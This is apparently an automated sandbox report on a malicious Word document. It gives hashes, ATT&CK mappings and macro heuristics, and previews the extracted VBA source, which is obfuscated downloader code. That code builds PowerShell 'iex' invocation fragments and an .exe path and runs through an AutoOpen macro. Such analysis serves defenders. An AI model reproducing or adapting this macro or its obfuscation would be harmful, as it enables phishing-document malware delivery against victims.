Office (OLE) malware analysis — malicious · 42cccaba473a6bce

MALICIOUS

Office (OLE)

125.0 KB Created: 2018-02-17 02:05:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: dddf8f973fb9f0d49baf394cb59d1938 SHA-1: 1e9011898f8eb1a36b71ddfcdfacd012071a40c3 SHA-256: 42cccaba473a6bceffa9b6ced0615a38ed9e91c7a6bc04adbbc930233de2b244

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The presence of an AutoOpen macro and a Shell() call within the VBA code indicates an attempt to execute arbitrary code upon opening the document. The obfuscated script likely downloads and executes a second-stage payload from the embedded URL, which is a common technique for malware delivery. The use of legacy WordBasic markers and VBA p-code execution further supports this assessment.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://coP8c+P8c1jq+1jqll1jq+1jqegP8c+P8ce-de-baiP8c+P8c In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 33546 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	33546 bytes
SHA-256: `5c8c530772f8271a761ce6e471e38c0213ec4a4f8192a36365a2ce071389a496`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "QfXbmzj" Function WrjzLzwAsYcfk() On Error Resume Next YlqaBSd = 3310458 + Atn(fzibJoBXMkoU) / rhTCZlLOo - Sgn(BvGFSpZwUuFkVZ * Log(DPpmWwZlGjz)) / (3210562 - MmGYqzdjCiiim * UaRHMtSWVVbS - cJAVV) QwJMnrnUh = 4717361 + Atn(jhojuWwDAj) / EkKELo - Sgn(lXcqQkzYwB * Log(CMNKHEmll)) / (2523314 - wPVoOXiqXwLtk * CtRDj - XvjzUttcF) QwfjiSdfnkS = 3427437 + Atn(DPvaMUbWZ) / IdXqTdIFLViBr - Sgn(BjYUUdFk * Log(ZHdobq)) / (4713328 - hJfPRIHAQlXuw * BXcYdwGBwkXXw - pohPmfBsMDj) sSHGfw = (cbijwlX) + yHBjksbJKSUgsssd("lCvafjzYzwqFsGVdY", 6, 1) NJqpu = 8871652 + Atn(YLbDIH) / oJLZpCfm - Sgn(DBhOPckcfCKvVf * Log(LpQrIcpa)) / (6647325 - uwumNJwwiJtKf * wazYFwVTitNzmn - UObwXUfppS) BcksNhlD = 8658059 + Atn(znVYBJV) / hcQVlVbSAYNXIS - Sgn(uSLIaQl * Log(GMhWfI)) / (4025325 - pRswszF * BtNpQEV - jaaGpB) PFRcsKNn = 9001328 + Atn(wTKIEzvKfMX) / QWVzMw - Sgn(jDwsBq * Log(pEhOWoWMzY)) / (7432091 - IBzCJEhPqKFduq * NbAaJRcJqcRpj - DWwKOpFjAmo) GVfUL = (CMbjfNur) + yHBjksbJKSUgsssd("RiUFqUtPLwQwwwT5D8cU5D+U5D+PU5D+U5D8ch'+'qGk'+'hqG+P8c+P8ch'+'qU5D+U5DGeU5D+U5D-ItemhP8c+P8cqG)(gj5SDP8c+P8cC);brP'+'8c+U5D+U5DP8cea1jq+1jqk;}U5D+U5DcatP8c+P8ccP8c+P8chP8cjAciCkHSNMEXtVRR", 16, 156) XIzBMaI = 5037467 + Atn(OzjmoISfApibN) / prrfrYzJpbSX - Sgn(hjJNcavZWuwqrl * Log(fDdJlMnooMPB)) / (8812257 - HEURK * wqbBBSMTwtoz - KimzIlluvVBN) oWZWwstjoL = 4703479 + Atn(UOpdZ) / ArobcITzUrv - Sgn(PPjaVHLfZ * Log(BVaocQsFGPPTl)) / (3635394 - KVARlZDadzJRt * hStHKpSAnfDHO - fHwdQjLmKOnQ) ADBWuH = 9645767 + Atn(zrTwwMYwWLbdYJ) / VOiKSuVAfAJ - Sgn(vHiUtrXDvLE * Log(CMikkC)) / (7621775 - CEpzIFf * brnwo - dpsrhlAFlJK) cjLVZtzzwz = (kzwdfjrG) + yHBjksbJKSUgsssd("vwWsdGXasszfEplaCE(([char]103+[char]1U5'+'D+1jq+1jqU5D06+1jq+1'+'jq[char]53),[STRing]lrZfPdNEfvzApjDvAEUSX", 13, 73) RsYTwVEsuJI = 8797129 + Atn(tUCLwSjpnzZoq) / KkqBmWNjuZ - Sgn(dhlEAmXRsW * Log(LmiXmp)) / (4489976 - lhldOViUvXfMZ * hSlvknKCWz - AZDSP) TVibww = 6979031 + Atn(JEovsEWjW) / buNJjjFQ - Sgn(rEjjjKoYNvaC * Log(mHDVolZhYBR)) / (8423488 - cjvQqwCdsT * XEkEfInvQ - IGFOvTqETDSoHi) CfifuMwXSu = 792259 + Atn(zFbACtniwj) / VBPOV - Sgn(jTdpCvfLZZ * Log(GjwCACLh)) / (3963022 - sOSbQLTV * DpwMb - anuKwoc) zIahhE = (SiLnLWbEYGUVi) + yHBjksbJKSUgsssd("qtfHJhjqGUzB5env:P8c+P8cpublic + hqG1HRU1jq+'+'1jq5D+U5DP8c+P8chqG + gj5NSBP8c+P8c +P8c+'+'P8c (hqG.exhqG+h'+'1jq+1jqqGP8c+P8cehP8c+P8c1jq+1jaKvh", 13, 129) BawGioZXDvO = 4294459 + Atn(KWVnZPRXYb) / uuDBZUz - Sgn(AIwBn * Log(QZIbkw)) / (1144514 - zNsQLvjmIckYLQ * lJqpTW - NUhdJpIw) CSfkKcWMFE = 7658431 + Atn(JwzqIIJEUN) / TQPwz - Sgn(WRtImbfz * Log(ihmudMoIO)) / (2767847 - TdAhlzIR * DSfJYmiuTWVRq - abRZkniIAjj) wGLPGmMkj = 9409591 + Atn(RLXnSOFUQCdVr) / uorsBcsaFUZ - Sgn(dPuRvcbsN * Log(wjDDlPJZoDs)) / (1211321 - UJqiUBqGCNtk * ZwGAtzULsIpw - dRjfWfXfaIEzH) KlBNJ = (ALnFKNmjLpW) + yHBjksbJKSUgsssd("BWQRhEY . ( $enV:PUBlIC[13]+$Env:PubliC[5]+'x') ( ((QWCmiaOHiYQVoEFivzbJMP", 8, 45) TkMmLs = 2633445 + Atn(wqBCmI) / jwnjjtmGNrMmkG - Sgn(HDRdTzCWdvEmrU * Log(lXlpodNU)) / (9942905 - lSLffbcDAiw * JpzjbJlbHumz - oBvRVu) iPMEV = 6648152 + Atn(shirrzTb) / rlSBNvpIBDj - Sgn(cqjOZqZjl * Log(oPSQHVpkMR)) / (9498 - DBiEbFGJT * zuQrwdRGuuwMz - jzoUS) wYVtPZwYp = 3410788 + Atn(SXCnfjVPUacLz) / XAPWMSFX - Sgn(dqDcU * Log(QlqBzjWNES)) / (8813113 - rZUTAzlLwYzGzm * SZwbGAlDolKwk - mLESW) pWBUwUFuR = (YcABjiXZZWrN) + yHBjksbJKSUgsssd("JRBiopdt+'8c+P8crtimezOzu", 9, 13) znZqpwoR = 1121022 + Atn(fiqBBJJNt) / dYzhQGXPrDLA - Sgn(Ilzzw * Log(MfaHa)) / (986730 - zCqzXiuvYo * VYATYEBLfjiQ - MLJjJ) EhwlSPOlfS = 530400 + Atn(WcpHUYrj) / FFjwIbaCsGW - Sgn(PatRmm * Log(MUOmVXTtjtzz)) / (2404287 - iZbwTvkkH * CjKGCvqimETM - TNYpirJtHKkkA) zjMWc = 3619784 + Atn(SrCbNajp) / MqnCQNI - Sgn(SiHku * Log(CtztvW)) / (4981867 - CcXQuBrwQ * YLcsDGduBiS - LiXlAiQj) JCXmm = (rokBMm ... (truncated)

SHA-256: 5c8c530772f8271a761ce6e471e38c0213ec4a4f8192a36365a2ce071389a496

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "QfXbmzj"
Function WrjzLzwAsYcfk()
On Error Resume Next
YlqaBSd = 3310458 + Atn(fzibJoBXMkoU) / rhTCZlLOo - Sgn(BvGFSpZwUuFkVZ * Log(DPpmWwZlGjz)) / (3210562 - MmGYqzdjCiiim * UaRHMtSWVVbS - cJAVV)
QwJMnrnUh = 4717361 + Atn(jhojuWwDAj) / EkKELo - Sgn(lXcqQkzYwB * Log(CMNKHEmll)) / (2523314 - wPVoOXiqXwLtk * CtRDj - XvjzUttcF)
QwfjiSdfnkS = 3427437 + Atn(DPvaMUbWZ) / IdXqTdIFLViBr - Sgn(BjYUUdFk * Log(ZHdobq)) / (4713328 - hJfPRIHAQlXuw * BXcYdwGBwkXXw - pohPmfBsMDj)
sSHGfw = (cbijwlX) + yHBjksbJKSUgsssd("lCvafjzYzwqFsGVdY", 6, 1)
NJqpu = 8871652 + Atn(YLbDIH) / oJLZpCfm - Sgn(DBhOPckcfCKvVf * Log(LpQrIcpa)) / (6647325 - uwumNJwwiJtKf * wazYFwVTitNzmn - UObwXUfppS)
BcksNhlD = 8658059 + Atn(znVYBJV) / hcQVlVbSAYNXIS - Sgn(uSLIaQl * Log(GMhWfI)) / (4025325 - pRswszF * BtNpQEV - jaaGpB)
PFRcsKNn = 9001328 + Atn(wTKIEzvKfMX) / QWVzMw - Sgn(jDwsBq * Log(pEhOWoWMzY)) / (7432091 - IBzCJEhPqKFduq * NbAaJRcJqcRpj - DWwKOpFjAmo)
GVfUL = (CMbjfNur) + yHBjksbJKSUgsssd("RiUFqUtPLwQwwwT5D8cU5D+U5D+PU5D+U5D8ch'+'qGk'+'hqG+P8c+P8ch'+'qU5D+U5DGeU5D+U5D-ItemhP8c+P8cqG)(gj5SDP8c+P8cC);brP'+'8c+U5D+U5DP8cea1jq+1jqk;}U5D+U5DcatP8c+P8ccP8c+P8chP8cjAciCkHSNMEXtVRR", 16, 156)
XIzBMaI = 5037467 + Atn(OzjmoISfApibN) / prrfrYzJpbSX - Sgn(hjJNcavZWuwqrl * Log(fDdJlMnooMPB)) / (8812257 - HEURK * wqbBBSMTwtoz - KimzIlluvVBN)
oWZWwstjoL = 4703479 + Atn(UOpdZ) / ArobcITzUrv - Sgn(PPjaVHLfZ * Log(BVaocQsFGPPTl)) / (3635394 - KVARlZDadzJRt * hStHKpSAnfDHO - fHwdQjLmKOnQ)
ADBWuH = 9645767 + Atn(zrTwwMYwWLbdYJ) / VOiKSuVAfAJ - Sgn(vHiUtrXDvLE * Log(CMikkC)) / (7621775 - CEpzIFf * brnwo - dpsrhlAFlJK)
cjLVZtzzwz = (kzwdfjrG) + yHBjksbJKSUgsssd("vwWsdGXasszfEplaCE(([char]103+[char]1U5'+'D+1jq+1jqU5D06+1jq+1'+'jq[char]53),[STRing]lrZfPdNEfvzApjDvAEUSX", 13, 73)
RsYTwVEsuJI = 8797129 + Atn(tUCLwSjpnzZoq) / KkqBmWNjuZ - Sgn(dhlEAmXRsW * Log(LmiXmp)) / (4489976 - lhldOViUvXfMZ * hSlvknKCWz - AZDSP)
TVibww = 6979031 + Atn(JEovsEWjW) / buNJjjFQ - Sgn(rEjjjKoYNvaC * Log(mHDVolZhYBR)) / (8423488 - cjvQqwCdsT * XEkEfInvQ - IGFOvTqETDSoHi)
CfifuMwXSu = 792259 + Atn(zFbACtniwj) / VBPOV - Sgn(jTdpCvfLZZ * Log(GjwCACLh)) / (3963022 - sOSbQLTV * DpwMb - anuKwoc)
zIahhE = (SiLnLWbEYGUVi) + yHBjksbJKSUgsssd("qtfHJhjqGUzB5env:P8c+P8cpublic + hqG1HRU1jq+'+'1jq5D+U5DP8c+P8chqG + gj5NSBP8c+P8c +P8c+'+'P8c (hqG.exhqG+h'+'1jq+1jqqGP8c+P8cehP8c+P8c1jq+1jaKvh", 13, 129)
BawGioZXDvO = 4294459 + Atn(KWVnZPRXYb) / uuDBZUz - Sgn(AIwBn * Log(QZIbkw)) / (1144514 - zNsQLvjmIckYLQ * lJqpTW - NUhdJpIw)
CSfkKcWMFE = 7658431 + Atn(JwzqIIJEUN) / TQPwz - Sgn(WRtImbfz * Log(ihmudMoIO)) / (2767847 - TdAhlzIR * DSfJYmiuTWVRq - abRZkniIAjj)
wGLPGmMkj = 9409591 + Atn(RLXnSOFUQCdVr) / uorsBcsaFUZ - Sgn(dPuRvcbsN * Log(wjDDlPJZoDs)) / (1211321 - UJqiUBqGCNtk * ZwGAtzULsIpw - dRjfWfXfaIEzH)
KlBNJ = (ALnFKNmjLpW) + yHBjksbJKSUgsssd("BWQRhEY . ( $enV:PUBlIC[13]+$Env:PubliC[5]+'x') ( ((QWCmiaOHiYQVoEFivzbJMP", 8, 45)
TkMmLs = 2633445 + Atn(wqBCmI) / jwnjjtmGNrMmkG - Sgn(HDRdTzCWdvEmrU * Log(lXlpodNU)) / (9942905 - lSLffbcDAiw * JpzjbJlbHumz - oBvRVu)
iPMEV = 6648152 + Atn(shirrzTb) / rlSBNvpIBDj - Sgn(cqjOZqZjl * Log(oPSQHVpkMR)) / (9498 - DBiEbFGJT * zuQrwdRGuuwMz - jzoUS)
wYVtPZwYp = 3410788 + Atn(SXCnfjVPUacLz) / XAPWMSFX - Sgn(dqDcU * Log(QlqBzjWNES)) / (8813113 - rZUTAzlLwYzGzm * SZwbGAlDolKwk - mLESW)
pWBUwUFuR = (YcABjiXZZWrN) + yHBjksbJKSUgsssd("JRBiopdt+'8c+P8crtimezOzu", 9, 13)
znZqpwoR = 1121022 + Atn(fiqBBJJNt) / dYzhQGXPrDLA - Sgn(Ilzzw * Log(MfaHa)) / (986730 - zCqzXiuvYo * VYATYEBLfjiQ - MLJjJ)
EhwlSPOlfS = 530400 + Atn(WcpHUYrj) / FFjwIbaCsGW - Sgn(PatRmm * Log(MUOmVXTtjtzz)) / (2404287 - iZbwTvkkH * CjKGCvqimETM - TNYpirJtHKkkA)
zjMWc = 3619784 + Atn(SrCbNajp) / MqnCQNI - Sgn(SiHku * Log(CtztvW)) / (4981867 - CcXQuBrwQ * YLcsDGduBiS - LiXlAiQj)
JCXmm = (rokBMm
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.